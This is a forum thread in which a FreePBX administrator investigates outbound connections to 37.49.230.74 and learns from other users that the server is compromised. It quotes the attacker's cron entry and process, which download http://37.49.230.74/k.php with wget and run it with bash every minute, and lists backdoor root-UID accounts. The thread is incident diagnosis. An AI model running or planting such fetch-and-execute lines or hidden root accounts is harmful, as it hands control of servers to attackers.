What is the significance of 37.49.230.74:80 to freepbx?

I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:

# netstat -an | grep 80
tcp        0      0 192.168.6.9:41780           0.0.0.0:*                   LISTEN      
tcp        0      1 192.168.6.9:42528           37.49.230.74:80             SYN_SENT    
tcp        0      1 192.168.6.9:42522           37.49.230.74:80             SYN_SENT    
tcp        0      1 192.168.6.9:42526           37.49.230.74:80             SYN_SENT  
. . .

My question: What is freebsd doing connecting to that address?

That is malicious traffic specific to FreePBX – your machine has already been compromised.

Had your firewall not blocked it, the script would have retrieved more malicious code.

So I see this:

root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Which is likely the compromise script running. How do I tell where is is running from?

That is interesting. I see this in cron:

*/1  * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to cleanup but you are assuming that you are smarter/more determined than the bad guys.

1 Like

This thread may be useful:

but I strongly agree with @adell4444 – start over.

Which of these are used by FreePBX?

root:x:0:0:root:/root:/bin/bash
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash

Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.

sugarmaint supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.

1 Like

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.